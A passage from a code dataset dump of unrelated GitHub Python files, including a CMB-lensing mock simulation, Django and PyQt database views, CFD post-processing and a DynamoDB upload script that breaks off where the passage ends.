pd.DataFrame(np.array([q_dr12['RA'],q_dr12['DEC'],q_dr12['Z_VI'],q_dr12['PSFMAG'][:,1],q_dr12['MI']]).T,columns=('ra','dec','z','MAG','MI'))\n\n\n\n'''\nexclude SGC and plot maps\n'''\n\nfrom astropy.coordinates import SkyCoord\nfrom astropy import units as u\nimport healpy as hp\n\nn = SkyCoord(ra=q_dr12['ra'],dec=q_dr12['dec'],unit='deg',frame='icrs')\nng = n.galactic\nl,b = ng.l,ng.b\nq_dr12 = q_dr12[b>0]\n\ng = SkyCoord(ra=q_dr12['ra'],dec=q_dr12['dec'],unit='deg',frame='icrs')\ngg = g.galactic\nl = gg.l.degree\nb = gg.b.degree\n\nq_indice = hp.pixelfunc.ang2pix(32,l,b,lonlat=True) \nq_map = np.zeros(hp.nside2npix(32), dtype=np.float) \nfor i in range(len(q_indice)): \n q_map[q_indice[i]] += 1\n\nmask_q = np.zeros(len(q_map)) # construct QSO mask with Nside=32 \nfor i in range(len(q_map)):\n if q_map[i] == 0: # identify empty pixels\n mask_q[i] = 0\n else:\n mask_q[i] = 1 \n\nmask_q = hp.pixelfunc.ud_grade(mask_q,nside_out=2048) # upgrade the mask to Nside=self.nside\n\nmask_k = hp.read_map('../mask.fits')\n\n# simulate \n\nfrom pipeline_mock import *\n\n# uniform distribution\n\nz_min = 2.2\nz_max = 3.4\ns = 2/5\n\n\ndef mock_spectrum(Ckk,Ckq,Cqq,bias,fwhm_list):\n\n alm_k,seed = hp.sphtfunc.synalm(Ckk)\n alm_q1,seed = hp.sphtfunc.synalm(Ckq**2/Ckk,seed=seed)\n alm_q2,seed = hp.sphtfunc.synalm(Cqq-Ckq**2/Ckk)\n\n alm_q = alm_q1 + alm_q2 \n\n map_k = mask_k*hp.alm2map(alm_k,nside=2048)\n map_q = mask_q*hp.alm2map(alm_q,nside=2048)\n \n mask_kq = mask_k*mask_q\n\n re_spec = []\n for fwhm in fwhm_list:\n \n if fwhm!=None:\n mask_kq = hp.sphtfunc.smoothing(mask_kq,fwhm=fwhm) \n \n fkq = np.mean(mask_kq*mask_k*mask_q)\n \n re = hp.sphtfunc.anafast(map_k*mask_kq,map_q*mask_kq,lmax=1200)\n re = re/fkq\n re_spec.append(re)\n \n return re_spec\n \nkernel_size = [None,np.deg2rad(10/60),np.deg2rad(30/60),np.deg2rad(1)] \nround_N = 200\nbias = 2.5\n\n# uniform sample\nuniform_cl = [[],[],[],[]]\nuniform_l = []\nuniform_model = []\n\nn_tot = 2*10**8\nsample = np.random.uniform(z_min,z_max,n_tot)\nmodel = mock(sample,z_min,z_max,s,z_reso=100,lmax=1200)\nNpix = hp.nside2npix(2048)\nn_avg = n_tot/Npix\nshot_noise = 1/n_avg\n\nell_kq, Ckq = model.Ckq(b=bias,x=range(1200),line=True)\nell_kk, Ckk = model.Ckk(x=range(800),line=True)\nCkk[0] = 1E-20\nell_qq, Cqq = model.Cqq(b=bias,x=range(1200),line=True)\n#Cqq = Cqq + shot_noise\n\nfor i in range(200):\n re_spec = mock_spectrum(Ckk,Ckq,Cqq,bias=bias,fwhm_list=kernel_size)\n #l_mk,cl_mk = bin_corr(Ckq)\n uniform_model.append(Ckq)\n #uniform_l.append(l_mk)\n for j,spec in enumerate(re_spec):\n #l_re,cl_re = bin_corr(spec)\n uniform_cl[j].append(spec)\n print('uniform:%d finished'%i)\n\nnp.save('cl_full.npy',np.array(uniform_cl))\n#np.save('l.npy',np.array(uniform_l))\nnp.save('model_full.npy',np.array(uniform_model))\n\n\n\n","repo_name":"LittleLin1999/CMB-lensingxDLA","sub_path":"Apodization/kernel_size.py","file_name":"kernel_size.py","file_ext":"py","file_size_in_byte":3463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27896406603","text":"from .managers import *\nfrom server.common.controllers import CrudController\nfrom ..residente.managers import *\nfrom ..domicilio.managers import *\nfrom ..movimiento.managers import *\nfrom ..invitado.managers import *\nfrom ..areasocial.managers import *\nimport os.path\nimport uuid\nimport json\n\n\nclass EventoController(CrudController):\n\n manager = EventoManager\n html_index = \"condominios/evento/views/index.html\"\n html_table = \"condominios/evento/views/table.html\"\n routes = {\n '/evento': {'GET': 'index', 'POST': 'table'},\n '/evento_insert': {'POST': 'insert'},\n '/evento_update': {'PUT': 'edit', 'POST': 'update'},\n '/evento_delete': {'POST': 'delete'},\n '/evento_validar_invitacion': {'POST': 'validar_invitacion'},\n '/evento_importar': {'POST': 'importar'},\n '/evento_reporte_xls': {'POST': 'imprimirxls'},\n '/evento_filtrar': {'POST': 'filtrar'}\n }\n\n def get_extra_data(self):\n aux = super().get_extra_data()\n us = self.get_user()\n objeto = []\n\n aux['objeto'] = objeto\n aux['residentes'] = ResidenteManager(self.db).listar_residentes(us)\n aux['invitados'] = InvitadoManager(self.db).listar_x_residente(us)\n aux['tipoeventos'] = TipoEventoManager(self.db).listar_todo()\n aux['areasociales'] = AreasocialManager(self.db).listar_todo(us)\n aux['tipopases'] = TipopaseManager(self.db).listar_todo()\n aux['eventos'] = EventoManager(self.db).listar_eventos_dia(us)\n\n return aux\n\n def insert(self):\n self.set_session()\n diccionary = json.loads(self.get_argument(\"object\"))\n diccionary['user'] = self.get_user_id()\n diccionary['ip'] = self.request.remote_ip\n EventoManager(self.db).insert(diccionary)\n self.respond(success=True, message='Insertado correctamente.')\n\n def update(self):\n self.set_session()\n diccionary = json.loads(self.get_argument(\"object\"))\n diccionary['user'] = self.get_user_id()\n diccionary['ip'] = self.request.remote_ip\n EventoManager(self.db).update(diccionary)\n self.respond(success=True, message='Modificado correctamente.')\n\n\n def delete(self):\n self.set_session()\n diccionary = json.loads(self.get_argument(\"object\"))\n respuesta = EventoManager(self.db).delete(diccionary['id'],diccionary['enabled'], self.get_user_id(), self.request.remote_ip)\n\n self.respond(success=True, message=respuesta)\n self.db.close()\n\n def validar_invitacion(self):\n self.set_session()\n diccionary = json.loads(self.get_argument(\"object\"))\n indicted_object = EventoManager(self.db).validar_invitacion_lector(diccionary['codigoautorizacion'])\n if indicted_object:\n self.respond(indicted_object.get_dict(),success=True, message='/resources/images/aceptado.png')\n self.db.close()\n else:\n self.respond(success=False, message='/resources/images/rechazado.png')\n self.db.close()\n\n\n def filtrar(self):\n self.set_session()\n data = json.loads(self.get_argument(\"object\"))\n\n ins_manager = self.manager(self.db)\n fechainicio = datetime.strptime(data['fechainicio'], '%d/%m/%Y')\n fechafin = datetime.strptime(data['fechafin'], '%d/%m/%Y')\n user = self.get_user_id()\n arraT = EventoManager(self.db).get_page(1, 10, None, None, True)\n arraT['datos'] = ins_manager.filtrar(fechainicio, fechafin, user)\n\n self.respond(response=[objeto.get_dict() for objeto in arraT['datos']], success=True,\n message='actualizado correctamente.')\n\n","repo_name":"berthy7/sigas","sub_path":"server/condominios/evento/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":3661,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71854152121","text":"#Script de post-traitement des donnees.\n\nimport optparse\nimport math\nimport os\n\n\ndef properties():\n # ouverture des fichiers\n nomFic = 'test_VEF.data'\n nomFic_prop='properties.dat'\n\n fic = open(nomFic,'r')\n fic_prop = open(nomFic_prop,'w')\n\n chaines = [\"# hauteur_marche\",\n \"BOTTO Paroi_flux_impose\",\n \"rho Champ_Uniforme\",\n \"Cp Champ_Uniforme\",\n \"# U0\",\n \"IN Frontiere_ouverte_temperature_imposee\"] # Texte a rechercher\n\n for ligne in fic:\n for chaine in chaines:\n if chaine in ligne:\n tLigne = ligne.split()\n if chaine==\"# hauteur_marche\":\n h=float(tLigne[2])\n if chaine==\"BOTTO Paroi_flux_impose\":\n Qw=float(tLigne[4])\n if chaine==\"rho Champ_Uniforme\":\n rho=float(tLigne[3])\n if chaine==\"Cp Champ_Uniforme\":\n Cp=float(tLigne[3])\n if chaine==\"# U0\":\n U0=float(tLigne[2])\n if chaine==\"IN Frontiere_ouverte_temperature_imposee\":\n T0=float(tLigne[4])\n\n\n fic_prop.write('%18.4f %18.4f %18.4f %18.4f %18.4f %18.4f' % (h,Qw,rho,Cp,U0,T0))\n\n fic.close()\n fic_prop.close()\n\n return h,Qw,rho,Cp,U0,T0\n\ndef ecrire_Stanton(sonde,h,Qw,rho,Cp,U0,T0):\n\n fichier_read=open(sonde,'r')\n fichier_write=open('Stanton.dat','w')\n\n ligne = fichier_read.readlines()\n n=len(ligne)\n\n for i in range (1,n):\n\n tligne=ligne[i].split()\n fichier_write.write('%18.8f %18.8f\\n' % (float(tligne[0])/h,Qw/(rho*Cp*U0*(float(tligne[1])-T0))))\n\n fichier_read.close()\n fichier_write.close()\n\ndef normalise_Stanton(fichier):\n\n fichier_read=open(fichier,'r')\n fichier_write=open('Stanton_normalise.dat','w')\n\n ligne=fichier_read.readlines()\n n=len(ligne)\n\n tligne0=ligne[1].split()\n max=float(tligne0[1])\n\n for i in range (2,n-1):\n tligne=ligne[i].split()\n if (float(tligne[1])>max):\n max=float(tligne[1])\n\n for i in range (1,n):\n tligne=ligne[i].split()\n fichier_write.write('%18.8f %18.8f\\n' %(float(tligne[0]),float(tligne[1])/max))\n\n fichier_read.close()\n fichier_write.close()\n\n\ndef normalise_profil_vitesse(fichier,h,U0):\n\n fichier_read=open(fichier,'r')\n fichier_write=open(fichier+'_normalise.dat','w')\n\n ligne = fichier_read.readlines()\n n=len(ligne)\n\n for i in range (1,n):\n\n tligne=ligne[i].split()\n fichier_write.write('%18.8f %18.8f\\n' % (float(tligne[0])/h,float(tligne[1])/U0))\n\n fichier_read.close()\n fichier_write.close()\n\ndef normalise_profil_temperature(fichier,h,T0):\n\n fichier_read=open(fichier,'r')\n fichier_write=open(fichier+'_normalise.dat','w')\n\n ligne = fichier_read.readlines()\n n=len(ligne)\n\n for i in range (1,n):\n\n tligne=ligne[i].split()\n fichier_write.write('%18.8f %18.8f\\n' % (float(tligne[0])/h,float(tligne[1])-T0))\n\n fichier_read.close()\n fichier_write.close()\n\ndef extract_utau(h):\n# extrait les valeurs de x et utau sur la face BOTTOM du domaine, au dernier temps. Ecrit fichier avec utau=f(x/h)\n# ATTENTION: PROCEDURE ADAPTEE A LA TAILLE DU MAILLAGE UTILISE\n\n# ouverture des fichiers\n nomFicUstar = 'test_VEF_pb_Ustar.face'\n\n ficUstar = open(nomFicUstar,'r')\n fichier_write=open('Ustar_bottom.dat','w')\n\n # lecture de ligne -> entetes\n fichier = ficUstar.readlines()\n\n #tant que la derniere ligne est vide\n while fichier[-1]==\"\" or fichier[-1]==\"\\n\":\n del fichier [-1]\n\n #on enleve les 55 dernieres lignes (jusqu'a la face bottom) avant les donnees sur la face qui nous interesse: attention a mettre le bon nb de lignes\n i=0\n while i < 55:\n\n del fichier [-1]\n i=i+1\n\n commentaire=\"\"\n i=len(fichier)\n cumul=0\n u=0.\n\n\n #on va prendre les valeurs de x et utau au dernier temps et sur la face \"bottom\"\n while commentaire!=\"----------------\":\n ligne=fichier[i-1]\n if ligne != \"\\n\" and ligne != \"\":\n tLigne = ligne.split(\"|\")\n commentaire = tLigne[0]\n if commentaire!=\"----------------\":\n #on eclate la ligne en un tableau de valeurs\n tLigne=ligne.split(\"|\")\n #on ecrit x et utau:\n x=float(tLigne[0])\n utau=float(tLigne[4])\n\n\n fichier_write.write('%18.8f %18.8f\\n' %(x/h,utau))\n i=i-1\n\n fichier_write.close()\n ficUstar.close()\n\ndef ecrire_xr(fichier,h):\n# fonction qui calcule la longueur de reattachement\n\n xr_expe=0.2508\n xr_expe_adim=6.6\n fichier_read=open(fichier,'r')\n fichier_write=open('longueur_reattachement.dat','w')\n\n ligne = fichier_read.readlines()\n n=len(ligne)\n\n i=n-1\n tligne2=ligne[i].split()\n tligne1=ligne[i-1].split()\n V2=float(tligne2[1])\n V1=float(tligne1[1])\n\n while (V1 > 0 and i>2):\n i=i-1\n tligne2=ligne[i].split()\n tligne1=ligne[i-1].split()\n V2=float(tligne2[1])\n V1=float(tligne1[1])\n\n x2=float(tligne2[0])\n x1=float(tligne1[0])\n\n if i==2:\n xr=0\n print('attention: pas de point de reattachement trouve, il semble ne pas y avoir de zone de recirculation')\n else:\n xr = x1 - (V1*((x2-x1)/(V2-V1)))\n\n error=abs(((xr-xr_expe)/xr_expe)*100)\n fichier_write.write('%18.2f %18.2f %18.2f %18.2f %18.2f\\n' %(xr,xr/h,error,xr_expe,xr_expe_adim))\n\n fichier_read.close()\n fichier_write.close()\n\nif __name__ == '__main__':\n\n parser = optparse.OptionParser()\n (options, args) = parser.parse_args()\n\n h,Qw,rho,Cp,U0,T0=properties()\n\n sonde_Twall='test_VEF_SONDE_TWALL.coupe'\n\n ecrire_Stanton(sonde_Twall,h,Qw,rho,Cp,U0,T0)\n normalise_Stanton('Stanton.dat')\n\n extract_utau(h)\n\n #profils de vitesse\n normalise_profil_vitesse('test_VEF_SONDE_V1_LONGI.coupe',h,U0)\n normalise_profil_vitesse('test_VEF_SONDE_V2_LONGI.coupe',h,U0)\n normalise_profil_vitesse('test_VEF_SONDE_V3_LONGI.coupe',h,U0)\n normalise_profil_vitesse('test_VEF_SONDE_V4_LONGI.coupe',h,U0)\n normalise_profil_vitesse('test_VEF_SONDE_V5_LONGI.coupe',h,U0)\n normalise_profil_vitesse('test_VEF_SONDE_V6_LONGI.coupe',h,U0)\n\n #profils de temperature\n normalise_profil_temperature('test_VEF_SONDE_T1.coupe',h,T0)\n normalise_profil_temperature('test_VEF_SONDE_T2.coupe',h,T0)\n normalise_profil_temperature('test_VEF_SONDE_T3.coupe',h,T0)\n normalise_profil_temperature('test_VEF_SONDE_T4.coupe',h,T0)\n normalise_profil_temperature('test_VEF_SONDE_T5.coupe',h,T0)\n\n\n #calcul de la longueur de reattachement\n ecrire_xr('test_VEF_SONDE_BOTTOM_GRAV.coupe',h)\n","repo_name":"cea-trust-platform/TrioCFD-code","sub_path":"share/Validation/Rapports_automatiques/Turbulence/RANS/Heated_Backward_Facing_Step_2D/src/Post.py","file_name":"Post.py","file_ext":"py","file_size_in_byte":6760,"program_lang":"python","lang":"fr","doc_type":"code","stars":31,"dataset":"github-code","pt":"40"} +{"seq_id":"74706672119","text":"from typing import Protocol\n\nimport aio_pika\nfrom pika.adapters.blocking_connection import BlockingChannel\nfrom pika.spec import Basic, BasicProperties\n\n\nclass T_on_message_callback(Protocol):\n \"\"\".\"\"\"\n\n async def __call__(\n self,\n ch: BlockingChannel,\n mh: Basic.Deliver,\n props,\n body: bytes,\n\n ) -> None: ...\n\n\nclass T_on_message_callbackAsync(Protocol):\n \"\"\".\"\"\"\n\n async def __call__(\n self,\n message: aio_pika.abc.AbstractIncomingMessage,\n ) -> None: ...\n\n\ndef getMessageSuccess(\n ch: BlockingChannel,\n mh: Basic.Deliver,\n props: BasicProperties,\n body: bytes,\n callback: T_on_message_callback = lambda: None\n):\n \"\"\"\n Успешное получение сообщения\n\n :param callback: Полезная функцию которую нужно выполнить\n :param ch: Канал откуда пришло сообщение\n :param mh: Данные про очередь\n :param props:\n :param body: Сырые данные от отправителя\n :return:\n\n .. code-block:: python\n\n rabbitmq.chanel.basic_consume(\n # Случайная уникальная очередь\n queue=rabbitmq.queue[0],\n # Что делать с полученным сообщением\n on_message_callback=partial(\n getMessageSuccess,\n callback=self_\n )\n )\n \"\"\"\n # Вызвать пользовательскую функцию\n callback(body=body, ch=ch, mh=mh, props=props)\n #: Подтвердить получение сообщения.\n #: Убедитесь что отключено авто п отверждение\n #: rabbitmq_chanel.basic_consume(auto_ack=False)\n ch.basic_ack(delivery_tag=mh.delivery_tag)\n\n\nasync def getMessageSuccessAsync(\n message: aio_pika.abc.AbstractIncomingMessage,\n callback: T_on_message_callbackAsync = lambda: None\n):\n \"\"\"\n Успешное получение сообщения\n\n :param message:\n :param callback: Полезная функцию которую нужно выполнить\n \"\"\"\n # Вызвать пользовательскую функцию\n await callback(message)\n","repo_name":"denisxab/rbmq_pack","sub_path":"rbmqsync/logic_massage.py","file_name":"logic_massage.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43060824211","text":"from app.views import *\nfrom app.services.user_service import *\nfrom app.services.group_service import all_groups\n\n@login_required\n@permission_required('auth.view_user')\ndef user_list(request):\n users = users_all(exclude_superadmins=True)\n context = {'users': users}\n return render(request, 'user/user_list.html', context)\n\n@login_required\n@permission_required('auth.add_user')\ndef user_create(request):\n form = UserForm()\n form.fields['groups'].choices = [(g.pk, get_string(g.name, request)) for g in Group.objects.all().exclude(name='student')]\n\n if request.method == 'POST':\n form = UserForm(request.POST)\n form.fields['groups'].choices = [(g.pk, g.name) for g in Group.objects.all().exclude(name='student')]\n if form.is_valid():\n data = form.cleaned_data\n list_data = [data[value] for value in data]\n if create_or_update_user(None, *list_data):\n messages.success(request, get_string('successfully created user', request))\n return redirect(user_list)\n\n messages.warning(request, get_string('this username is taken. please type another username', request))\n\n context = {'form': form, 'title': 'user', 'title1': 'creating', 'header1': 'user', 'header2': 'creating'}\n return render(request, 'main/create.html', context)\n\n@login_required\n@permission_required('auth.change_user')\ndef user_update(request, pk):\n user = get_user_by_pk(pk)\n if request.method == 'POST':\n form = UserForm(request.POST)\n form.fields['groups'].choices = [(g.pk, g.name) for g in Group.objects.all().exclude(name='student')]\n if form.is_valid():\n data = form.cleaned_data\n list_data = [data[value] for value in data]\n create_or_update_user(user, *list_data)\n messages.success(request, get_string('successfully updated user', request))\n return redirect(user_list)\n\n form = UserForm(initial={\n 'username': user.username,\n 'first_name': user.first_name,\n 'last_name': user.last_name,\n 'email': user.email,\n # 'password': user.password,\n 'groups': list(filter_groups_of_user(user).values_list('pk', flat=True)),\n })\n\n form.fields['groups'].choices = [(g.pk, get_string(g.name, request)) for g in Group.objects.all().exclude(name='student')]\n context = {'form': form, 'title': 'user', 'title1': 'changing', 'header1': 'user', 'header2': user.username}\n return render(request, 'main/edit.html', context)\n\n@login_required\n@permission_required('auth.delete_user')\ndef user_delete(request, pk):\n user = get_user_by_pk(pk)\n user.delete()\n messages.success(request, get_string('successfully deleted user', request))\n return redirect(user_list)","repo_name":"xiidot1303/miraziz_school","sub_path":"app/views/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36849867007","text":"import json\n\nfrom channels.generic.websocket import AsyncWebsocketConsumer\n\n\nclass HomeConsumer(AsyncWebsocketConsumer):\n async def connect(self):\n user_id = self.scope[\"session\"].get(\"ws_user\")\n\n self.group_name = f\"user_{user_id}\" # Set the group name\n\n # Add the client to the group\n await self.channel_layer.group_add(self.group_name, self.channel_name)\n\n await self.accept()\n\n async def disconnect(self, close_code):\n await self.channel_layer.group_discard(self.group_name, self.channel_name)\n\n async def send_stock_update(self, event):\n # Send a custom message to the client\n await self.send(text_data=json.dumps(event))\n","repo_name":"Kepins/int-Django-Stock","sub_path":"djangostock/application/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"73628655799","text":"class DomainInfo(object):\n\n def __init__(self, domainName=None, domainState=None, templateId=None, startDate=None, endDate=None, cloudDnsId=None, modified=None):\n \"\"\"\n :param domainName: (Optional) 域名\n :param domainState: (Optional) 域名状态 0失败 1正常 2预注册 3过期 4转出中 5已转出 6过户中\n :param templateId: (Optional) 模板ID\n :param startDate: (Optional) 域名起始时间\n :param endDate: (Optional) 域名结束时间\n :param cloudDnsId: (Optional) 京东云解析域名ID\n :param modified: (Optional) 最后变更时间\n \"\"\"\n\n self.domainName = domainName\n self.domainState = domainState\n self.templateId = templateId\n self.startDate = startDate\n self.endDate = endDate\n self.cloudDnsId = cloudDnsId\n self.modified = modified\n","repo_name":"jdcloud-api/jdcloud-sdk-python","sub_path":"jdcloud_sdk/services/domain/models/DomainInfo.py","file_name":"DomainInfo.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"40"} +{"seq_id":"33083485090","text":"##“a층의 b호에 살려면 자신의 아래(a-1)층의 1호부터 b호까지 사람들의 수의 합만큼 사람들을 데려와 살아야 한다”\n## 0층부터 있고 각층에는 1호부터 있으며, 0층의 i호에는 i명이 산다.\n## 재귀함수\n\ndef house(floor, room):\n if (floor == 0):\n return room\n else:\n sum = 0\n for i in range(1,room+1):\n sum = sum + house(floor-1, i)\n return sum\n\ntestCase = int(input())\nfor t in range(testCase):\n floor = int(input())\n room = int(input())\n print(house(floor,room))\n","repo_name":"kkhdss165/BOJ_PYTHON","sub_path":"2775.py","file_name":"2775.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23332619694","text":"'''\nn과 m\nn개의 자연수 중에서 m개를 고른 수열\n'''\ndef perm(i, n, m):\n if i == m:\n print(*p)\n return\n else:\n for j in range(n):\n if used[j] == 0:\n p[i] = arr[j]\n used[j] = 1\n perm(i+1, n, m)\n used[j] = 0\n\nimport sys\ninput = sys.stdin.readline\n\n# n개의 자연수, m개 선택\nn, m = map(int, input().split())\n\n# 자연수\narr = sorted(list(map(int, input().split())))\nused = [0] * n\np = [0] * m\n\nperm(0, n, m)","repo_name":"YUNA-AHN/TIL","sub_path":"Prac/boj 15654.py","file_name":"boj 15654.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"7656553304","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\nfrom django.urls import path\n\nfrom recruit.views import api, analyze, files, docs\n\nurlpatterns = [\n path(r'wj/', api.WjView.as_view({\n \"post\": \"list\"\n })),\n\n path(r'wj/<int:pk>/', api.WjView.as_view({\n \"post\": \"single\",\n })),\n\n path(r'answer/', api.AnswerView.as_view({\n 'post': 'post',\n 'get': 'list'\n })),\n\n path(r'answer/<int:pk>/', api.AnswerView.as_view({\n 'get': 'single',\n })),\n\n path(r'respondentor/', api.RespondentsView.as_view({\n 'get': 'list',\n 'post': 'post'\n })),\n\n path(r'report/<int:pk>/', analyze.AnalysisCharacterView.as_view({\n 'get': 'get',\n 'post': 'post',\n })),\n\n path(r'file/', files.FileView.as_view({\n 'post': 'create',\n 'get': 'get',\n })),\n\n path(r'postion/', api.PositionView.as_view({\n 'get': 'list',\n })),\n\n path(r'admin-help-docs/', docs.background_docs),\n path(r'api_documentation/', docs.api_documentation),\n]\n","repo_name":"tao625/wechatRecruit","sub_path":"apps/recruit/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"30134618324","text":"from question_data import Question_list\nclass Question():\n def __init__(self,text,answer) :\n self.question_text = text\n self.question_answer = answer\n\nclass QuizBrain():\n def __init__(self,q_list):\n self.que_num = 0\n self.score = 0\n self.que_list = q_list\n\n def still_has_que(self):\n return self.que_num < len(self.que_list)\n\n def next_question(self):\n current_que = self.que_list[self.que_num]\n #print(current_que)\n self.que_num +=1\n user_ans = input(f\"Q.{self.que_num}:{current_que.question_text} (True/False) ?\\n\")\n self.check_ans(user_ans,current_que.question_answer)\n\n def check_ans(self,user_input,correct_ans):\n if user_input.lower()==correct_ans.lower():\n print(\"---- Yeah!! You got it right !! -----\")\n self.score +=1\n\n else:\n print(\"---- Ouch! That's a wrong answer ---- \")\n \n print(f\"Your score is :{self.score}/{self.que_num}\")\n print(\"--------------------------------------------\")\n#-----------------------------------------------------------------------------\n# ------------------- Main -------------\n\nQuestion_bank = []\nfor que in Question_list:\n que_text = que[\"text\"]\n que_ans = que[\"answer\"]\n # print(que_text,que_ans)\n new_que_obj = Question(que_text,que_ans)\n Question_bank.append(new_que_obj)\n#print(Question_bank)\nquiz = QuizBrain(Question_bank)\n\nwhile quiz.still_has_que():\n quiz.next_question()\n\nprint(\"-------------The Game is Finished------------\\n ----------Hope You Enjoyed------------\")","repo_name":"Shruti-s29/50-Python-Projects","sub_path":"17.Quiz_game_OOP/17.Quiz_game_OOP.py","file_name":"17.Quiz_game_OOP.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74871661561","text":"# Problem A: Help a PhD candidate out!\n\ninp = input()\ntest_cases = int(inp)\n\ns = []\ni = 0\nwhile i < test_cases:\n inp = input()\n s.append(inp)\n i += 1\n\ni = 0\nwhile i < test_cases: \n if s[i] == \"P=NP\":\n print(\"skipped\")\n else:\n res = [int(j) for j in s[i].split(\"+\") if j.isdigit()]\n print(res[0]+res[1])\n i += 1","repo_name":"dellod/CPClub","sub_path":"feb5/A_phd.py","file_name":"A_phd.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10357969664","text":"from PyQt5.QtWidgets import QWidget, QPushButton, QComboBox, QListWidget, QListWidgetItem\n\nimport UpdateDialog\nimport main\n\n\nclass UpdateWindow(QWidget):\n def __init__(self):\n super().__init__()\n\n # Instance Variable Declarations\n self.table_list = None\n self.record_list = None\n # After records have been imported from the database, store them in record_cache\n # Keys are table names, values are data. This saves load time when switching between tables.\n self.record_cache = {}\n # End of Instance Variable Declarations\n\n self.setup_window()\n\n def setup_window(self):\n self.setGeometry(100, 300, 1400, 700)\n self.setWindowTitle(\"Update Database Records\")\n self.table_list = QComboBox(self)\n self.table_list.move(50, 20)\n self.table_list.resize(200, 25)\n self.populate_table_list()\n self.table_list.currentIndexChanged.connect(self.populate_record_list)\n self.record_list = QListWidget(self)\n self.record_list.move(50, 80)\n self.record_list.resize(1300, 520)\n self.populate_record_list()\n update_button = QPushButton(\"Update\", self)\n update_button.clicked.connect(self.update_record)\n update_button.resize(update_button.sizeHint())\n update_button.move(50, 650)\n delete_button = QPushButton(\"Delete\", self)\n delete_button.clicked.connect(self.delete_record)\n delete_button.resize(delete_button.sizeHint())\n delete_button.move(1250, 650)\n self.show()\n\n def populate_table_list(self):\n tables = [\"shows\", \"movies\", \"popularShows\", \"popularMovies\", \"ratings\"]\n for table in tables:\n self.table_list.addItem(table)\n\n # Acts as a factory for items in the list of records. Records are checked against the\n # cache of records to save load times. Then values are concatenated into a single string.\n # I use string slicing to strip off excess formatting. It takes up less space than using\n # logic to prevent the extra \" --- \" from being put on in the first place.\n def populate_record_list(self):\n self.record_list.clear()\n current_table = self.table_list.currentText()\n records = self.record_cache.get(current_table)\n if records is None:\n db = main.open_db(\"im.db\")\n records = main.query_entire_table(db[1], current_table)\n self.record_cache[current_table] = records\n main.close_db(db[0])\n\n for record in records:\n fields = \"\"\n for column in record.keys():\n fields += column + \": \" + str(record[column]) + \" --- \"\n QListWidgetItem(fields[:-5], self.record_list)\n\n def update_record(self):\n if self.record_list.currentItem() is not None:\n update_form = UpdateDialog.UpdateDialog(self.convert_record_to_dict())\n update_form.exec()\n updated_record = update_form.record_data\n\n db = main.open_db(\"im.db\")\n main.update_record(db[1], self.table_list.currentText(), updated_record)\n main.close_db(db[0])\n\n def delete_record(self):\n db = main.open_db(\"im.db\")\n current_record = self.record_list.currentItem()\n\n # Records are in the list as a single string. This line uses some string manipulation to isolate the id\n record_id = current_record.text().split(\" --- \")[0]\n\n main.delete_record(db[1], self.table_list.currentText, record_id)\n main.close_db(db[0])\n\n # Method assumes text is being taken directly from the QListWidget when formatting\n def convert_record_to_dict(self) -> dict:\n current_record = self.record_list.currentItem().text()\n formatted_record = {}\n record_text = current_record.split(\" --- \")\n for field in record_text:\n pair = field.split(\": \")\n formatted_record[pair[0]] = pair[1]\n return formatted_record\n","repo_name":"SouzaNicholas/NSouzaIMDBProject","sub_path":"UpdateWindow.py","file_name":"UpdateWindow.py","file_ext":"py","file_size_in_byte":3970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70765288762","text":"#!/usr/bin/env python3\n\nimport sys\nimport boto3\nimport json\n\n\ndef main(argv):\n\tif len(argv) < 3:\n\t\tprint(\"Error: usage \" + argv[0] + \" <looter json path> <rekognition json path>\")\n\t\treturn\n\n\tawsAccessKeyId = input(\"AWS Access Key ID: \")\n\tawsAccessKeySecret = input(\"AWS Access Key Secret: \")\n\n\tdynamodb_client = boto3.client(\n\t\tservice_name=\"dynamodb\",\n\t\tregion_name=\"eu-west-1\",\n\t\taws_access_key_id = awsAccessKeyId,\n\t\taws_secret_access_key = awsAccessKeySecret\n\t)\n\n\ttables = dynamodb_client.list_tables()\n\tif not tables or not tables[\"TableNames\"] or \\\n\t\t\t(\"looter\" not in tables[\"TableNames\"]) or \\\n\t\t\t(\"rekognition\" not in tables[\"TableNames\"]):\n\t\tprint(\"Error: tables doesn't exist\")\n\t\treturn\n\n\tid = \"\"\n\twith open(argv[1]) as looterJsonFile:\n\t\tlooterJsonContent = json.loads(looterJsonFile.read())\n\n\t\tid = looterJsonContent[\"id\"]\n\n\t\tresponse = dynamodb_client.put_item(\n\t\t\tTableName='looter',\n\t\t\tItem={\n\t\t\t\t\"id\" : { 'S': id },\n\t\t\t\t\"timestamp\" : { 'S': str(looterJsonContent[\"taken_at_timestamp\"]) },\n\t\t\t\t\"url\" : { 'S': looterJsonContent[\"display_url\"] },\n\t\t\t\t\"description\" : { 'S': looterJsonContent[\"edge_media_to_caption\"][\"edges\"][0][\"node\"][\"text\"] },\n\t\t\t\t\"likesCount\" 